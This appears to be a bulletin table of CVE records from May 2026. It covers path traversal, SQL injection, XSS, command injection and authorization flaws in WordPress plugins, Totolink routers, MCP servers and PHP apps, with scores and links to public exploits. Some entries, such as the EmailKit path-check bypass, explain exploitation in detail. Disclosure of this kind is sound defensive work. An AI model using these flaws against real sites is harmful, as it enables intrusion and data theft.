| roxnor--EmailKit Email Customizer for WooCommerce & WP | The EmailKit plugin for WordPress is vulnerable to Arbitrary File Read in all versions up to and including 1.6.5. This is due to a flawed path traversal validation in the create_template() method of the CheckForm class, where realpath() is called on the allowed base directory (wp-content/uploads/emailkit/templates/) which may not exist, causing it to return false. In PHP 8.x, strpos($real_path, false) implicitly converts false to an empty string, and strpos() with an empty needle always returns 0, causing the check strpos(...) !== 0 to evaluate to false and bypassing the path validation entirely. This makes it possible for authenticated attackers, with Author-level access and above, to read arbitrary files from the server, including sensitive files such as wp-config.php, by supplying an absolute path to the emailkit-editor-template REST API parameter. | 2026-05-05 | 6.5 | CVE-2026-5957 | https://www.wordfence.com/threat-intel/vulnerabilities/id/ae58e5b0-b587-4503-8519-c5a50245891a?source=cve https://plugins.trac.wordpress.org/browser/emailkit/tags/1.6.5/includes/Admin/Api/CheckForm.php#L166 https://plugins.trac.wordpress.org/browser/emailkit/tags/1.6.5/includes/Admin/Api/CheckForm.php#L170 https://plugins.trac.wordpress.org/browser/emailkit/tags/1.6.5/includes/Admin/EmailSettings/MetformEmailSettings.php#L252 https://plugins.trac.wordpress.org/browser/emailkit/trunk/includes/Admin/Api/CheckForm.php#L170 https://plugins.trac.wordpress.org/browser/emailkit/trunk/includes/Admin/Api/CheckForm.php#L163 https://plugins.trac.wordpress.org/browser/emailkit/tags/1.6.5/includes/Admin/Api/CheckForm.php#L163 https://plugins.trac.wordpress.org/browser/emailkit/trunk/includes/Admin/Api/CheckForm.php#L166 https://plugins.trac.wordpress.org/browser/emailkit/trunk/includes/Admin/EmailSettings/MetformEmailSettings.php#L252 https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3511701%40emailkit%2Ftrunk&old=3496714%40emailkit%2Ftrunk&sfp_email=&sfph_mail= |
| wpmudev--Forminator Forms Contact Form, Payment Form & Custom Form Builder | The Forminator Forms plugin for WordPress is vulnerable to Missing Authorization in versions up to and including 1.53.0. This is due to the listen_for_saving_export_schedule() function in library/class-export.php failing to perform a capability check before saving the scheduled export configuration, unlike the parallel listen_for_csv_export() function which correctly verifies user permissions. This makes it possible for authenticated attackers with subscriber-level access to configure a scheduled export job that emails all form submissions to an attacker-controlled email address, resulting in sensitive data exfiltration. | 2026-05-07 | 6.5 | CVE-2026-6214 | https://www.wordfence.com/threat-intel/vulnerabilities/id/d7b8d42c-bceb-456e-a682-358e8df831e3?source=cve https://plugins.trac.wordpress.org/browser/forminator/trunk/library/class-export.php#L178 https://plugins.trac.wordpress.org/browser/forminator/tags/1.51.1/library/class-export.php#L178 https://plugins.trac.wordpress.org/browser/forminator/trunk/admin/classes/class-admin-l10n.php#L448 https://plugins.trac.wordpress.org/browser/forminator/tags/1.51.1/admin/classes/class-admin-l10n.php#L448 https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3512045%40forminator%2Ftrunk&old=3510688%40forminator%2Ftrunk&sfp_email=&sfph_mail= |
| sszdh--Simple Owl Shortcodes | The Simple Owl Shortcodes plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'num' attribute of the 'owls_wrapper' shortcode in all versions up to, and including, 2.1.1 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2026-05-05 | 6.4 | CVE-2026-6255 | https://www.wordfence.com/threat-intel/vulnerabilities/id/e33a2f27-20c2-4963-9558-1eead0515690?source=cve https://plugins.trac.wordpress.org/browser/simple-owl-shortcodes/tags/2.1.1/inc/owls_wrapper.php#L11 https://plugins.trac.wordpress.org/browser/simple-owl-shortcodes/trunk/inc/owls_wrapper.php#L11 |
| MuffinGroup--Betheme | The Betheme theme for WordPress is vulnerable to Arbitrary File Deletion in versions up to, and including, 28.4. This is due to the upload_icons() function workflow using a user-controlled upload path (`mfn-icon-upload`) in a filesystem move operation without constraining it to the uploads directory. This makes it possible for authenticated attackers, with contributor-level access and above, to move/delete arbitrary local files via path traversal. | 2026-05-05 | 6.5 | CVE-2026-6262 | https://www.wordfence.com/threat-intel/vulnerabilities/id/3486f114-5625-4751-a25e-2c5ab7b15b38?source=cve https://support.muffingroup.com/changelog/ |
| Red Hat--Red Hat Enterprise Linux 10 | A flaw was found in Keylime. An attacker with root access on an enrolled monitored machine, where the Keylime agent runs, can exploit a vulnerability in the Keylime verifier. The verifier uses a hardcoded challenge nonce for Trusted Platform Module (TPM) quote attestation instead of a cryptographically random value. This allows the attacker to stockpile valid TPM quotes and replay them to evade detection after compromising the system. This issue affects only the push model deployment. | 2026-05-06 | 6.3 | CVE-2026-6420 | https://access.redhat.com/security/cve/CVE-2026-6420 RHBZ#2458889 |
| iovamihai--Affiliate Program Suite SliceWP Affiliates | The Affiliate Program Suite - SliceWP Affiliates plugin for WordPress is vulnerable to Stored Cross-Site Scripting via shortcode attributes in all versions up to, and including, 1.2.7. This is due to insufficient input sanitization and output escaping on user-supplied attributes in the 'slicewp_affiliate_url' shortcode. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2026-05-06 | 6.4 | CVE-2026-6672 | https://www.wordfence.com/threat-intel/vulnerabilities/id/5b9e92ea-49fc-420d-9d0e-29bcf78843bd?source=cve https://plugins.trac.wordpress.org/changeset/3517135/slicewp |
| zingaya--Zingaya Click-to-Call | The Zingaya Click-to-Call plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'email', 'first_name', 'last_name', and 'phone' parameters on the plugin's sign-up admin page in all versions up to, and including, 1.0. This is due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. | 2026-05-05 | 6.1 | CVE-2026-6696 | https://www.wordfence.com/threat-intel/vulnerabilities/id/5bdd515c-6b52-467c-9446-6ae9b3b75e50?source=cve https://wordpress.org/plugins/zingaya-click-to-call/ https://plugins.trac.wordpress.org/browser/zingaya-click-to-call/tags/1.0/zingaya-admin.php#L62 https://plugins.trac.wordpress.org/browser/zingaya-click-to-call/tags/1.0/zingaya-admin.php#L71 https://plugins.trac.wordpress.org/browser/zingaya-click-to-call/tags/1.0/zingaya-admin.php#L79 https://plugins.trac.wordpress.org/browser/zingaya-click-to-call/tags/1.0/zingaya-admin.php#L104 |
| foux--Publish 2 Ping.fm | The Publish 2 Ping.fm plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.1. This is due to missing or incorrect nonce validation on the '/wp-admin/options-general.php?page=admin.php' page. This makes it possible for unauthenticated attackers to update settings and inject malicious web scripts via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. | 2026-05-05 | 6.1 | CVE-2026-6702 | https://www.wordfence.com/threat-intel/vulnerabilities/id/c0dc5349-139a-4bf3-8503-0e75b132c68c?source=cve https://plugins.trac.wordpress.org/browser/publish-2-pingfm/trunk/php/admin.php#L136 https://plugins.trac.wordpress.org/browser/publish-2-pingfm/tags/1.1/php/admin.php#L136 https://plugins.trac.wordpress.org/browser/publish-2-pingfm/trunk/php/admin.php#L76 https://plugins.trac.wordpress.org/browser/publish-2-pingfm/tags/1.1/php/admin.php#L76 https://plugins.trac.wordpress.org/browser/publish-2-pingfm/trunk/php/prefs.php#L219 https://plugins.trac.wordpress.org/browser/publish-2-pingfm/tags/1.1/php/prefs.php#L219 |
| phpsandeepkumar--Blog Settings | The Blog Settings plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'page' parameter in all versions up to, and including, 1.0. This is due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. | 2026-05-05 | 6.1 | CVE-2026-6704 | https://www.wordfence.com/threat-intel/vulnerabilities/id/d28e5374-dd34-4745-a20b-059e9846d96d?source=cve https://wordpress.org/plugins/blog-settings/ https://plugins.trac.wordpress.org/browser/blog-settings/tags/1.0/blog-settings.php#L173 https://plugins.trac.wordpress.org/browser/blog-settings/tags/1.0/blog-settings.php#L46 |
| Rapid7--Velociraptor | Velociraptor versions prior to 0.76.4 contain a cross organization authorization bypass in the HTTP API. A user with only the reader role in the root organization (the lowest authenticated role, holding only READ_RESULTS permission ) can issue a single authenticated HTTP GET that can read any files from other orgs - even if they have no explicit permissions in the target org. However, the problem does not occur in reverse - a user with read access to a sub org is unable to read from other org or the root org. | 2026-05-06 | 6.8 | CVE-2026-6863 | https://docs.velociraptor.app/announcements/advisories/cve-2026-6863/ |
| latepoint--LatePoint Calendar Booking Plugin for Appointments and Events | The LatePoint plugin for WordPress is vulnerable to Stored Cross-Site Scripting in all versions up to and including 5.5.0. This is due to insufficient input sanitization on the customer cabinet profile update endpoint - where raw POST parameters (first_name, last_name, phone, notes) bypass sanitization because OsCustomerModel does not override params_to_sanitize(), causing set_data() to store unsanitized values verbatim in the database - combined with insufficient output escaping in generate_preview(), which injects those stored values into notification template HTML via str_replace() without any esc_html() call before echoing the result. This makes it possible for authenticated attackers with customer-level access or above to inject arbitrary web scripts into the admin notification preview panel that execute in an administrator's or agent's browser whenever a notification template referencing customer variables such as {{customer_full_name}}, {{customer_first_name}}, {{customer_last_name}}, {{customer_phone}}, or {{customer_notes}} is previewed. | 2026-05-06 | 6.4 | CVE-2026-7457 | https://www.wordfence.com/threat-intel/vulnerabilities/id/628b3f53-decd-47ac-a2d1-339ade1e6944?source=cve https://plugins.trac.wordpress.org/browser/latepoint/trunk/lib/misc/process_action.php#L606 https://plugins.trac.wordpress.org/browser/latepoint/tags/5.5.0/lib/misc/process_action.php#L606 https://plugins.trac.wordpress.org/browser/latepoint/trunk/lib/controllers/customer_cabinet_controller.php#L318 https://plugins.trac.wordpress.org/browser/latepoint/tags/5.5.0/lib/controllers/customer_cabinet_controller.php#L318 https://plugins.trac.wordpress.org/browser/latepoint/trunk/lib/helpers/replacer_helper.php#L276 https://plugins.trac.wordpress.org/browser/latepoint/tags/5.5.0/lib/helpers/replacer_helper.php#L276 https://plugins.trac.wordpress.org/browser/latepoint/tags/5.3.1/lib/misc/process_action.php#L606 https://plugins.trac.wordpress.org/browser/latepoint/tags/5.3.1/lib/controllers/customer_cabinet_controller.php#L318 https://plugins.trac.wordpress.org/browser/latepoint/tags/5.3.1/lib/helpers/replacer_helper.php#L276 https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3522933%40latepoint%2Ftrunk&old=3516282%40latepoint%2Ftrunk&sfp_email=&sfph_mail= |
| wowdevs--Sky Addons Elementor Addons with Widgets & Templates | The Sky Addons plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the `sky-custom-scripts` custom post type in all versions up to, and including, 3.3.2. This is due to the custom post type being registered with `capability_type => 'post'` and `show_in_rest => true`, combined with insufficient input sanitization on the `sky_script_content` meta field and lack of output escaping when rendering scripts on the frontend. This makes it possible for authenticated attackers, with Author-level access and above, to inject arbitrary web scripts via the REST API that execute on every frontend page for all site visitors. | 2026-05-08 | 6.4 | CVE-2026-7475 | https://www.wordfence.com/threat-intel/vulnerabilities/id/cfaa8ffd-549e-4803-aa17-d1317a606e7a?source=cve https://plugins.trac.wordpress.org/browser/sky-elementor-addons/tags/3.3.2/includes/custom-scripts/class-custom-scripts-data.php#L128 https://plugins.trac.wordpress.org/browser/sky-elementor-addons/tags/3.3.2/includes/custom-scripts/class-custom-scripts-loader.php#L270 https://plugins.trac.wordpress.org/browser/sky-elementor-addons/trunk/includes/custom-scripts/class-custom-scripts-data.php#L134 https://plugins.trac.wordpress.org/browser/sky-elementor-addons/tags/3.3.3/includes/custom-scripts/class-custom-scripts-data.php#L134 https://plugins.trac.wordpress.org/browser/sky-elementor-addons/trunk/includes/custom-scripts/class-custom-scripts-loader.php#L237 https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3521696%40sky-elementor-addons%2Ftrunk&old=3517772%40sky-elementor-addons%2Ftrunk&sfp_email=&sfph_mail= |
| oleksandrz--E2Pdf Export Pdf Tool for WordPress | The E2Pdf - Export Pdf Tool for WordPress plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'id' attribute of the `e2pdf-download` shortcode in all versions up to, and including, 1.32.17. This is due to insufficient input sanitization and output escaping on the shortcode attribute. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2026-05-08 | 6.4 | CVE-2026-7650 | https://www.wordfence.com/threat-intel/vulnerabilities/id/36310ab1-f84e-4154-b782-51254c476d79?source=cve https://wordpress.org/plugins/e2pdf https://plugins.trac.wordpress.org/browser/e2pdf/tags/1.32.00/classes/model/e2pdf-shortcode.php#L157 https://plugins.trac.wordpress.org/browser/e2pdf/trunk/classes/model/e2pdf-shortcode.php#L172 https://plugins.trac.wordpress.org/browser/e2pdf/tags/1.32.18/classes/model/e2pdf-shortcode.php#L172 https://plugins.trac.wordpress.org/changeset/3522046/e2pdf/trunk/classes/model/e2pdf-shortcode.php |
| crocodilestick--Calibre-Web-Automated | A vulnerability was detected in crocodilestick Calibre-Web-Automated up to 4.0.6. Affected by this vulnerability is the function generate_auth_token of the file cps/kobo_auth.py of the component Kobo auth-token Route. The manipulation results in improper authorization. The attack may be performed from remote. The exploit is now public and may be used. Upgrading to version 4.0.7 addresses this issue. The patch is identified as 9f50bb2c16160564c9f8777dc2ceed3eb95e4807. The affected component should be upgraded. | 2026-05-04 | 6.3 | CVE-2026-7713 | VDB-360889 | crocodilestick Calibre-Web-Automated Kobo auth-token Route kobo_auth.py generate_auth_token improper authorization VDB-360889 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #806403 | crocodilestick Calibre-Web-Automated v1.0.0-v4.0.6 IDOR in auth-token generation leading to account takeover https://github.com/crocodilestick/Calibre-Web-Automated/issues/1303 https://github.com/new-usemame/Calibre-Web-NextGen/pull/18 https://gist.github.com/menelausx/ef98aa78ed2869ccaa316ff45ed1a440 https://github.com/new-usemame/Calibre-Web-NextGen/commit/9f50bb2c16160564c9f8777dc2ceed3eb95e4807 https://github.com/new-usemame/Calibre-Web-NextGen/releases/tag/v4.0.7 https://github.com/crocodilestick/Calibre-Web-Automated/ |
| crocodilestick--Calibre-Web-Automated | A flaw has been found in crocodilestick Calibre-Web-Automated up to 4.0.6. Affected by this issue is some unknown functionality of the file cps/cwa_functions.py of the component Admin Endpoint. This manipulation causes missing authentication. It is possible to initiate the attack remotely. The exploit has been published and may be used. The project was informed of the problem early through a pull request but has not reacted yet. | 2026-05-04 | 6.5 | CVE-2026-7714 | VDB-360890 | crocodilestick Calibre-Web-Automated Admin Endpoint cwa_functions.py missing authentication VDB-360890 | CTI Indicators (IOB, IOC, IOA) Submit #806468 | crocodilestick Calibre-Web-Automated v1.0.0-v4.0.6 Denial of Service https://github.com/crocodilestick/Calibre-Web-Automated/issues/1304 https://github.com/crocodilestick/Calibre-Web-Automated/pull/1308 https://gist.github.com/menelausx/1b45c952d352a2ebdc01cd8d5aa88e87 https://github.com/crocodilestick/Calibre-Web-Automated/ |
| ravenwits--mcp-server-arangodb | A vulnerability has been found in ravenwits mcp-server-arangodb up to 0.4.7. This affects the function arango_backup of the file src/tools.ts of the component MCP Interface. Such manipulation of the argument outputDir leads to path traversal. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The project was informed of the problem early through an issue report but has not responded yet. | 2026-05-04 | 6.3 | CVE-2026-7715 | VDB-360891 | ravenwits mcp-server-arangodb MCP tools.ts arango_backup path traversal VDB-360891 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #806913 | ravenwits mcp-server-arangodb 0.4.7 Path Traversal https://github.com/ravenwits/mcp-server-arangodb/issues/7 https://github.com/BruceJqs/public_exp/issues/34 https://github.com/ravenwits/mcp-server-arangodb/ |
| code-projects--Gym Management System In PHP | A vulnerability was found in code-projects Gym Management System In PHP and Windows NT 1.0. This vulnerability affects unknown code of the file /index.php. Performing a manipulation of the argument day results in sql injection. The attack can be initiated remotely. The exploit has been made public and could be used. | 2026-05-04 | 6.3 | CVE-2026-7716 | VDB-360892 | code-projects Gym Management System In PHP/Windows NT index.php sql injection VDB-360892 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #807105 | Code-projects Gym Management System In PHP 1.0 SQL injection https://github.com/QAp89/CVE/blob/main/SQL1.md https://code-projects.org/ |
| Totolink--WA300 | A vulnerability was identified in Totolink WA300 5.2cu.7112_B20190227. Impacted is the function setWebWlanIdx of the file /cgi-bin/cstecgi.cgi of the component POST Request Handler. The manipulation of the argument webWlanIdx leads to command injection. The attack may be initiated remotely. The exploit is publicly available and might be used. | 2026-05-04 | 6.3 | CVE-2026-7718 | VDB-360894 | Totolink WA300 POST Request cstecgi.cgi setWebWlanIdx command injection VDB-360894 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #807196 | Totolink WA300 WA300 V5.2cu.7112_B20190227 Command Injection https://lavender-bicycle-a5a.notion.site/TOTOLINK-WA300-setWebWlanIdx-34553a41781f800ab40ae0c3d68c78a6?pvs=73 https://www.totolink.net/ |
| Totolink--WA300 | A weakness has been identified in Totolink WA300 5.2cu.7112_B20190227. The impacted element is the function setLanguageCfg of the file /cgi-bin/cstecgi.cgi of the component POST Request Handler. This manipulation of the argument langType causes command injection. Remote exploitation of the attack is possible. The exploit has been made available to the public and could be used for attacks. | 2026-05-04 | 6.3 | CVE-2026-7720 | VDB-360896 | Totolink WA300 POST Request cstecgi.cgi setLanguageCfg command injection VDB-360896 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #807198 | Totolink WA300 WA300 V5.2cu.7112_B20190227 Command Injection https://lavender-bicycle-a5a.notion.site/TOTOLINK-WA300-setLanguageCfg-34553a41781f8007b6c5c7964d424286 https://www.totolink.net/ |
| Totolink--WA300 | A security vulnerability has been detected in Totolink WA300 5.2cu.7112_B20190227. This affects the function NTPSyncWithHost of the file /cgi-bin/cstecgi.cgi. Such manipulation of the argument hostTime leads to command injection. The attack can be executed remotely. The exploit has been disclosed publicly and may be used. | 2026-05-04 | 6.3 | CVE-2026-7721 | VDB-360897 | Totolink WA300 cstecgi.cgi NTPSyncWithHost command injection VDB-360897 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #807199 | Totolink WA300 WA300 V5.2cu.7112_B20190227 Command Injection https://lavender-bicycle-a5a.notion.site/TOTOLINK-WA300-NTPSyncWithHost-34553a41781f80808f3cfd14e1c603e7 https://www.totolink.net/ |
| PrefectHQ--prefect | A vulnerability was found in PrefectHQ prefect up to 3.6.25.dev6. Affected by this issue is some unknown functionality of the file src/prefect/runner/storage.py of the component GitRepository Pull Handler. The manipulation of the argument commit_sha/directories results in argument injection. It is possible to launch the attack remotely. The exploit has been made public and could be used. Upgrading to version 3.6.25.dev7 can resolve this issue. The patch is identified as 6a9d9918716ce4ee0297b69f3046f7067ef1faae. It is advisable to upgrade the affected component. The vendor was contacted early, responded in a very professional manner and quickly released a fixed version of the affected product. | 2026-05-04 | 6.3 | CVE-2026-7725 | VDB-360901 | PrefectHQ prefect GitRepository Pull storage.py argument injection VDB-360901 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #807356 | PerfectHQ Perfect <= 3.6.24 Argument Injection https://gist.github.com/nedlir/c37d90dda5f715790eafc970b2ef0c8a https://github.com/PrefectHQ/prefect/pull/21384 https://github.com/PrefectHQ/prefect/commit/6a9d9918716ce4ee0297b69f3046f7067ef1faae https://github.com/PrefectHQ/prefect/releases/tag/3.6.25.dev7 https://github.com/PrefectHQ/prefect/ |
| ryanjoachim--mcp-rtfm | A vulnerability was identified in ryanjoachim mcp-rtfm 0.1.0. This vulnerability affects the function get_doc_content/read_doc/update_doc of the component MCP Interface. Such manipulation of the argument docFile leads to path traversal. The attack can be launched remotely. The exploit is publicly available and might be used. The name of the patch is e6f0686fc36012f78236e7fed172c81444904b0b. It is best practice to apply a patch to resolve this issue. | 2026-05-04 | 6.3 | CVE-2026-7728 | VDB-360903 | ryanjoachim mcp-rtfm MCP update_doc path traversal VDB-360903 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #807538 | ryanjoachim mcp-rtfm 0.1.0, Commit 054fe515735cb477d4640c20930c04b243e443fc Path Traversal https://github.com/ryanjoachim/mcp-rtfm/issues/5 https://github.com/BruceJqs/public_exp/issues/35 https://github.com/ryanjoachim/mcp-rtfm/commit/e6f0686fc36012f78236e7fed172c81444904b0b https://github.com/ryanjoachim/mcp-rtfm/ |
| pixelsock--directus-mcp | A security flaw has been discovered in pixelsock directus-mcp 1.0.0. This issue affects the function validateUrl of the file index.ts of the component MCP Interface. Performing a manipulation of the argument fileUrl results in server-side request forgery. The attack may be initiated remotely. The exploit has been released to the public and may be used for attacks. The pull request to fix this issue awaits acceptance. | 2026-05-04 | 6.3 | CVE-2026-7729 | VDB-360904 | pixelsock directus-mcp MCP index.ts validateUrl server-side request forgery VDB-360904 | CTI Indicators (IOB, IOC, IOA) Submit #807539 | pixelsock directus-mcp 1.0.0, Commit 77758625355d105364eeaeac9afec2f743fe369b Server-Side Request Forgery https://github.com/pixelsock/directus-mcp/issues/13 https://github.com/pixelsock/directus-mcp/pull/14 https://github.com/BruceJqs/public_exp/issues/36 https://github.com/pixelsock/directus-mcp/ |
| privsim--mcp-test-runner | A weakness has been identified in privsim mcp-test-runner 0.2.0. Impacted is the function child_process.spawn of the file src/index.ts of the component MCP Interface. Executing a manipulation of the argument command can lead to os command injection. The attack may be launched remotely. The exploit has been made available to the public and could be used for attacks. The project was informed of the problem early through an issue report but has not responded yet. | 2026-05-04 | 6.3 | CVE-2026-7730 | VDB-360905 | privsim mcp-test-runner MCP index.ts child_process.spawn os command injection VDB-360905 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #807541 | privsim mcp-test-runner 0.2.0, Commit 83c84ed053f534774f7de935aeaa7698a5e5f9dc Command Injection https://github.com/privsim/mcp-test-runner/issues/24 https://github.com/BruceJqs/public_exp/issues/37 https://github.com/privsim/mcp-test-runner/ |
| code-projects--BloodBank Managing System | A security vulnerability has been detected in code-projects BloodBank Managing System 1.0. The affected element is an unknown function of the file get_state.php. The manipulation of the argument G_STATE_ID leads to sql injection. Remote exploitation of the attack is possible. The exploit has been disclosed publicly and may be used. | 2026-05-04 | 6.3 | CVE-2026-7731 | VDB-360906 | code-projects BloodBank Managing System get_state.php sql injection VDB-360906 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #807557 | Code-projects BLOODBANK MANAGING SYSTEM IN PHP 1.0 SQL injection https://github.com/QAp89/CVE/blob/main/SQL3.md https://code-projects.org/ |
| code-projects--BloodBank Managing System | A vulnerability was detected in code-projects BloodBank Managing System 1.0. The impacted element is an unknown function of the file request_blood.php. The manipulation results in unrestricted upload. The attack can be executed remotely. The exploit is now public and may be used. | 2026-05-04 | 6.3 | CVE-2026-7732 | VDB-360907 | code-projects BloodBank Managing System request_blood.php unrestricted upload VDB-360907 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #807558 | Code-projects BLOODBANK MANAGING SYSTEM IN PHP 1.0 arbitrary file upload leading to RCE vulnerability https://github.com/QAp89/CVE/blob/main/Arbitrary%20file%20upload%20leading%20to%20RCE1.md https://code-projects.org/ |
| puchunjie--doc-tools-mcp | A security flaw has been discovered in puchunjie doc-tools-mcp 1.0.18. This affects the function create_document/open_document of the file src/mcp-server.ts of the component MCP Interface. The manipulation of the argument filePath results in path traversal. The attack can be launched remotely. The exploit has been released to the public and may be used for attacks. The project was informed of the problem early through an issue report but has not responded yet. | 2026-05-04 | 6.3 | CVE-2026-7738 | VDB-360913 | puchunjie doc-tools-mcp MCP mcp-server.ts open_document path traversal VDB-360913 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #807642 | puchunjie @puchunjie/doc-tools-mcp 1.0.18, Commit c96df45a16710a3eec41a7a94c32b81468db28ea Path Traversal https://github.com/puchunjie/doc-tools-mcp/issues/4 https://github.com/BruceJqs/public_exp/issues/38 https://github.com/puchunjie/doc-tools-mcp/ |
| CodeAstro--Online Classroom | A vulnerability was detected in CodeAstro Online Classroom 1.0. Impacted is an unknown function of the file /OnlineClassroom/studentlogin. Performing a manipulation of the argument sid results in sql injection. Remote exploitation of the attack is possible. The exploit is now public and may be used. | 2026-05-04 | 6.3 | CVE-2026-7741 | VDB-360916 | CodeAstro Online Classroom studentlogin sql injection VDB-360916 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #807692 | codeastro Online Classroom V1.0 SQL Injection https://github.com/yuji0903/silver-guide/issues/18 https://codeastro.com/ |
| CodeAstro--Online Classroom | A flaw has been found in CodeAstro Online Classroom 1.0. The affected element is an unknown function of the file /OnlineClassroom/facultylogin. Executing a manipulation of the argument fid can lead to sql injection. The attack can be executed remotely. The exploit has been published and may be used. | 2026-05-04 | 6.3 | CVE-2026-7742 | VDB-360917 | CodeAstro Online Classroom facultylogin sql injection VDB-360917 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #807694 | codeastro Online Classroom V1.0 SQL Injection https://github.com/yuji0903/silver-guide/issues/19 https://codeastro.com/ |
| CodeAstro--Online Classroom | A vulnerability has been found in CodeAstro Online Classroom 1.0. The impacted element is an unknown function of the file /OnlineClassroom/studentdetails. The manipulation of the argument deleteid leads to sql injection. The attack is possible to be carried out remotely. The exploit has been disclosed to the public and may be used. | 2026-05-04 | 6.3 | CVE-2026-7743 | VDB-360918 | CodeAstro Online Classroom studentdetails sql injection VDB-360918 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #807695 | codeastro Online Classroom V1.0 SQL Injection https://github.com/yuji0903/silver-guide/issues/20 https://codeastro.com/ |
| CodeAstro--Online Classroom | A vulnerability was found in CodeAstro Online Classroom 1.0. This affects an unknown function of the file /OnlineClassroom/addnewstudent. The manipulation of the argument fname results in sql injection. The attack may be performed from remote. The exploit has been made public and could be used. | 2026-05-04 | 6.3 | CVE-2026-7744 | VDB-360919 | CodeAstro Online Classroom addnewstudent sql injection VDB-360919 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #807696 | codeastro Online Classroom V1.0 SQL Injection https://github.com/yuji0903/silver-guide/issues/21 https://codeastro.com/ |
| CodeAstro--Online Classroom | A vulnerability was determined in CodeAstro Online Classroom 1.0. This impacts an unknown function of the file /OnlineClassroom/facultydetails. This manipulation of the argument deleteid causes sql injection. It is possible to initiate the attack remotely. The exploit has been publicly disclosed and may be utilized. | 2026-05-04 | 6.3 | CVE-2026-7745 | VDB-360920 | CodeAstro Online Classroom facultydetails sql injection VDB-360920 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #807697 | codeastro Online Classroom V1.0 SQL Injection https://github.com/yuji0903/silver-guide/issues/22 https://codeastro.com/ |
| SourceCodester--Web-based Pharmacy Product Management System | A vulnerability was identified in SourceCodester Web-based Pharmacy Product Management System 1.0. Affected is an unknown function of the file /product_expiry/edit-admin.php. Such manipulation of the argument ID leads to sql injection. It is possible to launch the attack remotely. The exploit is publicly available and might be used. | 2026-05-04 | 6.3 | CVE-2026-7746 | VDB-360921 | SourceCodester Web-based Pharmacy Product Management System edit-admin.php sql injection VDB-360921 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #807693 | SourceCodester Web-based Pharmacy Product Management System V1.0 SQL Injection https://github.com/mjh134/CVE/issues/1 https://www.sourcecodester.com/ |
| CodeCanyon--Perfex CRM | A vulnerability was detected in CodeCanyon Perfex CRM up to 3.4.1. This affects the function Clients::project of the file application/controllers/Clients.php of the component Tenant Handler. The manipulation of the argument ID results in authorization bypass. The attack may be performed from remote. The exploit is now public and may be used. | 2026-05-04 | 6.3 | CVE-2026-7782 | VDB-360979 | CodeCanyon Perfex CRM Tenant Clients.php project authorization VDB-360979 | CTI Indicators (IOB, IOC, IOA) Submit #807683 | Canyon Perfex CRM CRM 3.4.1 Improper Authorization https://bytium.com/insights/perfex-crm-3-4-1-cross-tenant-broken-access-control-on-project-discussion-comments |
| CodeCanyon--Perfex CRM | A flaw has been found in CodeCanyon Perfex CRM up to 3.4.1. This vulnerability affects the function AbstractKanban::applySortQuery of the file application/services/AbstractKanban.php of the component Admin Kanban Endpoint. This manipulation of the argument this causes sql injection. It is possible to initiate the attack remotely. The exploit has been published and may be used. | 2026-05-04 | 6.3 | CVE-2026-7783 | VDB-360980 | CodeCanyon Perfex CRM Admin Kanban Endpoint AbstractKanban.php applySortQuery sql injection VDB-360980 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #807743 | CodeCanyon Perfex CRM 3.4.1 SQL Injection https://bytium.com/insights/blind-sql-injection-in-perfex-crm-3-4-1 |
| itsourcecode--Courier Management System | A vulnerability was identified in itsourcecode Courier Management System 1.0. This impacts an unknown function of the file /print_pdets.php. The manipulation of the argument ids leads to sql injection. The attack may be initiated remotely. The exploit is publicly available and might be used. | 2026-05-05 | 6.3 | CVE-2026-7822 | VDB-361074 | itsourcecode Courier Management System print_pdets.php sql injection VDB-361074 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #807773 | itsourcecode Courier Management System V1.0 SQL Injection https://github.com/ltranquility/submit/issues/14 https://itsourcecode.com/ |
